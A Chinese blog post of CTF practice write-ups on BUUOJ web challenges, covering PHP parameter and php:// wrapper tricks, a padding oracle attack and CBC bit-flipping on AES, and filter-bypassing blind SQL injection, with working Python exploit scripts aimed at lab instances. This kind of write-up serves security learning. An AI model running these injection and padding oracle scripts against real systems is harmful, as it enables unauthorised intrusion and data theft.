

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" type="image/png" href="/img/avatar.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>【CTF】三月练习 - 阿遠的BLOG</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Yuan's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                文章
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/NorthPole_ZH-CN14730815128_1920x1080.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="【CTF】三月练习">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-03-16 01:22" pubdate>
        2021年3月16日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      16
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">【CTF】三月练习</h1>
            
            <div class="markdown-body">
              <h1 id="BUUOJ-MRCTF2020-套娃"><a href="#BUUOJ-MRCTF2020-套娃" class="headerlink" title="[BUUOJ]-[MRCTF2020] 套娃"></a>[BUUOJ]-[MRCTF2020] 套娃</h1><h2 id="WriteUp"><a href="#WriteUp" class="headerlink" title="WriteUp"></a>WriteUp</h2><p>php代码审计题</p>
<p><strong>拿到题目首先看到：</strong></p>
<p><img src="https://i.loli.net/2021/03/16/voAINaQ2JTYdWxR.png" srcset="/img/loading.gif"></p>
<p>用到的函数：</p>
<blockquote>
<p>· substr_count($, ) 判断变量内所找字符的出现次数<br><br>· 正则表达式</p>
</blockquote>
<p>所传变量不能有_字符，故可以用.或者%5F代替绕过</p>
<p>同时23333后加上%0a表示换行来匹配后面的正则表达式</p>
<p>故传参 <strong>b.u.p.t=23333%0a</strong></p>
<p><strong>接着来到第二步：</strong></p>
<p>网页代码中出现以下提示（TSCTF-J里面也有这个</p>
<p><img src="https://i.loli.net/2021/03/16/8VSbAtj9XWsrIeh.png" srcset="/img/loading.gif"></p>
<p>浏览器解码后看到提示：<strong>post me Merak</strong></p>
<p>hackbar里post Merak等于任意值来到下一步</p>
<p><strong>第三步</strong></p>
<p><img src="https://i.loli.net/2021/03/16/OvbVCQgqywUoBmZ.png" srcset="/img/loading.gif"></p>
<p>自定义change函数 并且有一个if来判断是否可以访问flag</p>
<p>根据第二个if的判断条件，改ip为127.0.0.1</p>
<blockquote>
<p>file_get_contents():将文件内容输入为字符串</p>
</blockquote>
<p>故此处使用<a target="_blank" rel="noopener" href="https://www.php.cn/php-ask-430458.html">php伪协议</a>的方法传递“todat ……”</p>
<p>最后一步就是读懂change</p>
<blockquote>
<p>ord():将字符转化为ASCII码<br><br>chr():将ASCII码转化为字符</p>
</blockquote>
<p>可知当file的值经过change函数处理后，返回值re=flag.php,逆推得file的值应当为ZmpdYSZmXGI=</p>
<p>大致推理如下：（乱<br><img src="https://i.loli.net/2021/03/16/6yRsHOuLElDP4Zf.jpg" srcset="/img/loading.gif"></p>
<p>构造payload，改ip 搞定<br><img src="https://i.loli.net/2021/03/16/qHfedhQRUa2BA9X.png" srcset="/img/loading.gif"></p>
<h2 id="收获"><a href="#收获" class="headerlink" title="收获"></a>收获</h2><ol>
<li>php伪协议</li>
<li>部分php函数使用方法</li>
<li>正则匹配</li>
</ol>
<h1 id="V-amp-NCTF2021-Ez-game"><a href="#V-amp-NCTF2021-Ez-game" class="headerlink" title="[V&amp;NCTF2021]Ez_game"></a>[V&amp;NCTF2021]Ez_game</h1><h2 id="WriteUp-1"><a href="#WriteUp-1" class="headerlink" title="WriteUp"></a>WriteUp</h2><p>开局快乐游戏<br><img src="https://i.loli.net/2021/03/16/ceEfiyC9XGMuPNA.png" srcset="/img/loading.gif"></p>
<p>查看游戏源代码，没有加密<br><img src="https://i.loli.net/2021/03/16/WtI2wzJeUE8fZOL.png" srcset="/img/loading.gif"></p>
<p>在电脑上新建文件夹，创建命名为top的子文件夹，总之要创造出和上图文件结构一样的结构，并下载源码。点击Overrides载入刚才创好的文件夹，这时网页基于本地文件载入，修改本地js文件即可修改游戏。</p>
<p><img src="https://i.loli.net/2021/03/16/3nyV6O4gStAiqIu.png" srcset="/img/loading.gif"></p>
<p>修改游戏参数<br><img src="https://i.loli.net/2021/03/16/AFoGPaflugyiwCB.png" srcset="/img/loading.gif"><br><img src="https://i.loli.net/2021/03/16/vwjOU8MNJfD4lSZ.png" srcset="/img/loading.gif"></p>
<h2 id="收获-1"><a href="#收获-1" class="headerlink" title="收获"></a>收获</h2><p>js文件的本地调试方式（在浏览器直接修改没有用之后学习到了</p>
<h1 id="BUUOJ-NPUCTF2020-web🐕-36"><a href="#BUUOJ-NPUCTF2020-web🐕-36" class="headerlink" title="[BUUOJ]-[NPUCTF2020]web🐕 36"></a>[BUUOJ]-[NPUCTF2020]web🐕 36</h1><h2 id="WriteUp-2"><a href="#WriteUp-2" class="headerlink" title="WriteUp"></a>WriteUp</h2><p><img src="https://i.loli.net/2021/03/16/YwOZrXhdApG2NnD.png" srcset="/img/loading.gif"></p>
<p>加密函数说明：</p>
<p><strong>openssl_decrypt($data, $method, $password, $options, $iv)</strong></p>
<ol>
<li><p>$data 要加密的明文</p>
</li>
<li><p>$method 加密方法： DES-ECB    DES-CBC   DES-CTR   DES-OFB   DES-CF</p>
</li>
<li><p>$passwd 加密密钥</p>
</li>
<li><p>$options 数据格式选项（可选）</p>
</li>
<li><p>$iv 密初始化向量（可选）</p>
</li>
</ol>
<p>解密函数说明：</p>
<p><strong>openssl_decrypt($data, $method, $password, $options, $iv)</strong></p>
<p>同上</p>
<p>涉及到密码学的内容，即aes-128-cbc加密方式，其加密过程大致如下：<br><img src="https://i.loli.net/2021/03/16/Zm4Q6fXBpS87yr5.jpg" srcset="/img/loading.gif"></p>
<p>已知密文、iv、key未知，<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/ad8bdd87e131">Padding Oracle攻击</a>得明文。</p>
<p>吃了不会写脚本的亏唉。。。</p>
<p>只能看大佬的wp然后自己分析<br><a target="_blank" rel="noopener" href="https://tiaonmmn.github.io/2020/04/23/BUUOJ%E5%88%B7%E9%A2%98-Web-WebDog/">链接</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># coding:utf-8</span><br><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> time<br><span class="hljs-comment"># b&#x27;\x97.\xda\xb8\xa5P\t\x95\xae\x9b\xf5\xbf\xe2\x8b.&lt;&#x27;</span><br>CYPHERTEXT = base64.b64decode(<span class="hljs-string">&quot;ly7auKVQCZWum/W/4osuPA==&quot;</span>)<br><span class="hljs-comment"># initialization vector</span><br>IV = <span class="hljs-string">&quot;6666666666666666&quot;</span><br><span class="hljs-comment"># PKCS7 16个字节为1组</span><br>N = <span class="hljs-number">16</span><br><span class="hljs-comment"># intermediaryValue ^ IV = plainText</span><br>inermediaryValue = <span class="hljs-string">&quot;&quot;</span><br>plainText = <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-comment"># 爆破时不断需要更改的iv</span><br>iv = <span class="hljs-string">&quot;&quot;</span><br>URL = <span class="hljs-string">&quot;http://a271b253-dc1c-4113-ae0a-43f9c1c9caa9.node3.buuoj.cn/index.php?source=1&amp;method=decrypt&quot;</span><br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">xor</span>(<span class="hljs-params">a, b</span>):</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;&quot;</span>.join([<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(a[i]) ^ <span class="hljs-built_in">ord</span>(b[i])) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a))])<br><br><br><span class="hljs-keyword">for</span> step <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, N + <span class="hljs-number">1</span>):<br>    padding = <span class="hljs-built_in">chr</span>(step) * (step - <span class="hljs-number">1</span>)<br>    print(step,end=<span class="hljs-string">&quot;,&quot;</span>)<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">256</span>):<br>        print(i)<br>        iv = <span class="hljs-built_in">chr</span>(<span class="hljs-number">0</span>)*(N-step)+<span class="hljs-built_in">chr</span>(i)+xor(padding,inermediaryValue)<br>        data = &#123;<br>            <span class="hljs-string">&quot;data&quot;</span>: <span class="hljs-string">&quot;ly7auKVQCZWum/W/4osuPA==&quot;</span>,<br>            <span class="hljs-string">&quot;iv&quot;</span>: iv<br>        &#125;<br>        r = requests.post(URL,data = data)<br>        time.sleep(<span class="hljs-number">0.1</span>)<br>        <span class="hljs-keyword">if</span> r.text !=<span class="hljs-string">&quot;False&quot;</span>:<br>            inermediaryValue = xor(<span class="hljs-built_in">chr</span>(i),<span class="hljs-built_in">chr</span>(step)) + inermediaryValue<br>            print(inermediaryValue)<br>            <span class="hljs-keyword">break</span><br>plainText = xor(inermediaryValue,IV)<br>print(plainText)<br></code></pre></td></tr></table></figure>
<p>得到 <strong>FlagIsHere.php</strong></p>
<p>进去得到<img src="https://i.loli.net/2021/03/16/V3YP2myt85nNHO7.png" srcset="/img/loading.gif"></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/s1ye/p/9021202.html">CBC字节翻转攻击</a>（至少我觉得比上面要简单</p>
<p>exp：(整了半天结果应该转成byte类型)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><br>a=<span class="hljs-string">b&#x27;weber\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b&#x27;</span><br>b=<span class="hljs-string">b&#x27;piapiapiapia\x04\x04\x04\x04&#x27;</span><br>IV=base64.b64decode(<span class="hljs-string">&#x27;3gQBuDinKl2P/NYymzM1zA==&#x27;</span>)<br>result=<span class="hljs-string">b&#x27;&#x27;</span><br>i=<span class="hljs-number">0</span><br><span class="hljs-keyword">while</span> i&lt;<span class="hljs-number">16</span>:<br>    result+=<span class="hljs-built_in">bytes</span>([a[i]^IV[i]^b[i]])<br>    i+=<span class="hljs-number">1</span><br><br>print(base64.b64encode(result)) <span class="hljs-comment">#2QgCrSPNUT/lh7RYlDw6ww==</span><br></code></pre></td></tr></table></figure>
<p>之后要下载文件，BUU已经给出故无需下载</p>
<p>IDEA查看得：<br><img src="https://i.loli.net/2021/03/16/WZMave2biUN45EB.png" srcset="/img/loading.gif"></p>
<p>exp:<img src="https://i.loli.net/2021/03/16/yCUQRXbK6BJjqVs.png" srcset="/img/loading.gif"></p>
<p>flag: <strong>flag{we6_4og_1s_e4syg0ing}</strong></p>
<h2 id="收获-2"><a href="#收获-2" class="headerlink" title="收获"></a>收获</h2><ol>
<li>CBC翻转攻击</li>
<li>Padding Oracle攻击</li>
<li>ASE-CBC加密方式</li>
</ol>
<h1 id="BUUOJ-GYCTF2020-Ezsqli"><a href="#BUUOJ-GYCTF2020-Ezsqli" class="headerlink" title="[BUUOJ]-[GYCTF2020]Ezsqli"></a>[BUUOJ]-[GYCTF2020]Ezsqli</h1><h2 id="writeup"><a href="#writeup" class="headerlink" title="writeup"></a>writeup</h2><p>输入<strong>1 and 1=1</strong>和<strong>1’ or 1=1</strong>均出现以下信息：</p>
<p><img src="https://i.loli.net/2021/03/23/KzFNSi2h3fGgoZs.png" srcset="/img/loading.gif"></p>
<p>说明关键字符被过滤，再尝试<strong>1||1=1</strong>和<strong>1||1=2</strong>，出现以下回显：<br><img src="https://i.loli.net/2021/03/23/XkjsvUuMWcqgyBY.png" srcset="/img/loading.gif"></p>
<p>猜表名：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&#x27;http://27ae5101-3d15-4dd9-b0f0-2a5adb761e32.node3.buuoj.cn/&#x27;</span><br>payload = <span class="hljs-string">&#x27;2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),&#123;&#125;,1))=&#123;&#125;&#x27;</span><br>result = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">500</span>):<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br>        py = payload.<span class="hljs-built_in">format</span>(j,i)<br>        post_data = &#123;<span class="hljs-string">&#x27;id&#x27;</span>: py&#125;<br>        re = requests.post(url, data=post_data)<br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;Nu1L&#x27;</span> <span class="hljs-keyword">in</span> re.text:<br>            result += <span class="hljs-built_in">chr</span>(i)<br>            print(result)<br>            <span class="hljs-keyword">break</span><br></code></pre></td></tr></table></figure>
<p>结果如下，得到表名：<br><img src="https://i.loli.net/2021/03/23/UXetbT8xZvoCY53.png" srcset="/img/loading.gif"></p>
<p>进行注入：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> requests<br>url = <span class="hljs-string">&#x27;http://84a2e6b3-89be-4fe5-b729-0449f0351a3f.node3.buuoj.cn/&#x27;</span><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add</span>(<span class="hljs-params">flag</span>):</span><br>    res = <span class="hljs-string">&#x27;&#x27;</span><br>    res += flag<br>    <span class="hljs-keyword">return</span> res<br>flag = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">200</span>):<br>    <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br>        hexchar = add(flag + <span class="hljs-built_in">chr</span>(char))<br>        payload = <span class="hljs-string">&#x27;2||((select 1,&quot;&#123;&#125;&quot;)&gt;(select * from f1ag_1s_h3r3_hhhhh))&#x27;</span>.<span class="hljs-built_in">format</span>(hexchar)<br>        <span class="hljs-comment">#print(payload)</span><br>        data = &#123;<span class="hljs-string">&#x27;id&#x27;</span>:payload&#125;<br>        r = requests.post(url=url, data=data)<br>        text = r.text<br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;Nu1L&#x27;</span> <span class="hljs-keyword">in</span> r.text:<br>            flag += <span class="hljs-built_in">chr</span>(char-<span class="hljs-number">1</span>)<br>            print(flag)<br>            <span class="hljs-keyword">break</span><br></code></pre></td></tr></table></figure>
<h2 id="收获-3"><a href="#收获-3" class="headerlink" title="收获"></a>收获</h2><ol>
<li>进一步了解requests库</li>
<li>无列名注入（<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/98206699">参考1</a>;<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43952190/article/details/107588486?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161647316216780265428085%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=161647316216780265428085&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-3-107588486.first_rank_v2_pc_rank_v29&utm_term=%5BGYCTF2020%5DEzsqli+1">参考2</a>）</li>
</ol>
<h1 id=""><a href="#" class="headerlink" title=""></a></h1>
            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CTF/">CTF</a>
                    
                      <a class="hover-with-bg" href="/tags/Web/">Web</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明来自阿遠的Blog </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/03/04/Mysql%E8%AF%AD%E5%8F%A5%E8%AE%B0%E5%BD%95-0/">
                        <span class="hidden-mobile">Mysql语句</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     ©2021 By 阿遠 <br> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>基于Hexo搭建</span></a> |   <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>使用Fluid主题</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
